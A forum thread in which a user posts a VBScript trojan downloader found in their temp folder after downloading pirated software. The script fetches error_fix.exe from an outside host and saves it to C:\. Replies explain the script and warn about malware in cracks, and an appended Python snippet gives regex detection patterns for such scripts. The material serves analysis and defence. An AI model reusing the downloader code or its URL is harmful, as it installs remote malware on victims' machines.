What do you make of this script, trojan downloader?

onetwenty8k

I downloaded something of, let's say, questionable material to get "100% parts", if you know what I mean. I started getting errors thrown by UAC blocking a script. I went into my temp folder and there was a VB script called "dl". I opened it and it looks like it was trying to download a trojan. Note the name of the exe was changing. One time it was directx, another time it was sytem_fix, you get the idea. Here is the script; anyone care to tell me what exactly it was doing?

Code:
' Entry point: request the remote file and save it in the root of C:
HTTPDownload "http://1234now.0catch.com/error_fix.exe","C:\"

Sub HTTPDownload( myURL, myPath )
    Dim i, objFile, objFSO, objHTTP, strFile, strMsg
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    Set objFSO = CreateObject( "Scripting.FileSystemObject" )
    ' If myPath is a folder, keep the file name from the URL;
    ' otherwise treat myPath as the full target path
    If objFSO.FolderExists( myPath ) Then
        strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) )
    ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Then
        strFile = myPath
    Else
        Exit Sub
    End If
    ' Create (or overwrite) the target file
    Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True )
    ' Synchronous HTTP GET of the remote file
    Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
    objHTTP.Open "GET", myURL, False
    objHTTP.Send
    ' Copy the binary response to disk one byte at a time
    For i = 1 To LenB( objHTTP.ResponseBody )
        objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
    Next
    objFile.Close( )
End Sub
 
Well, that's what you get when you download files from questionable sources.

There was a guy here once purporting to want to buy a vidcard. He asked sellers to run some performance test on theirs. Don't remember the name of the program, but it was available as a limited demo from the official site. He PM'd people asking them to download what he said was an unlimited "cracked" version that he'd uploaded to one of those file sharing sites.

It was cracked alright... had a keylogger embedded into it. A bunch of people got scammed by it.
 
Unsurprisingly, it's going to make an HTTP request for "http://1234now.0catch.com/error_fix.exe" and save it to C:\. I don't have much desire to try to download that to see for sure if it's a trojan, but I'm pretty certain it's not going to fix your errors.
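
A static triage check for scripts like the one in the first post, as an added example that is not part of the thread: it looks for the three traits the dl script shows (a WinHttp request object, a file opened for writing, the raw response body being read) plus a quoted URL ending in an executable extension, without running or fetching anything. The function names, the extension list and the sample strings are assumptions made for the example.

```python
import re

# Constructed sample: lines lifted from the "dl" script quoted in the thread,
# kept as inert text. Nothing here is executed or fetched.
SAMPLE = r'''HTTPDownload "http://1234now.0catch.com/error_fix.exe","C:\"
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True )
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
objHTTP.Open "GET", myURL, False
objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
'''

# Constructed benign script: uses FileSystemObject but downloads nothing.
BENIGN = 'Set fso = CreateObject("Scripting.FileSystemObject")\nWScript.Echo fso.GetTempName()\n'

# One pattern per trait of the script in the thread.
CHECKS = {
    "http_client": re.compile(r'CreateObject\(\s*"WinHttp\.WinHttpRequest', re.I),
    "file_write": re.compile(r'\.OpenTextFile\([^)]*ForWriting', re.I),
    "raw_body": re.compile(r'\.ResponseBody\b', re.I),
}
URL_RE = re.compile(r'"(https?://[^"\s]+)"', re.I)
EXEC_EXT = (".exe", ".scr", ".dll", ".bat", ".cmd")  # assumed list, extend as needed


def defang(url):
    """Make a URL non-clickable before it goes into a ticket or report."""
    scheme, rest = url.split("://", 1)
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def triage(text):
    """Return matched traits, defanged URLs and an overall downloader verdict."""
    hits = sorted(name for name, rx in CHECKS.items() if rx.search(text))
    urls = URL_RE.findall(text)
    exe_urls = [u for u in urls if u.lower().split("?")[0].endswith(EXEC_EXT)]
    return {
        "indicators": hits,
        "urls": [defang(u) for u in urls],
        # Flag only when every trait is present and a URL points at an executable.
        "downloader": len(hits) == len(CHECKS) and bool(exe_urls),
    }


if __name__ == "__main__":
    print(triage(SAMPLE))
    print(triage(BENIGN))
```

A script that builds its URL from string fragments or writes with the literal mode `2` instead of `ForWriting` will not match these patterns, so a clean result here is not proof that a script is harmless.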
 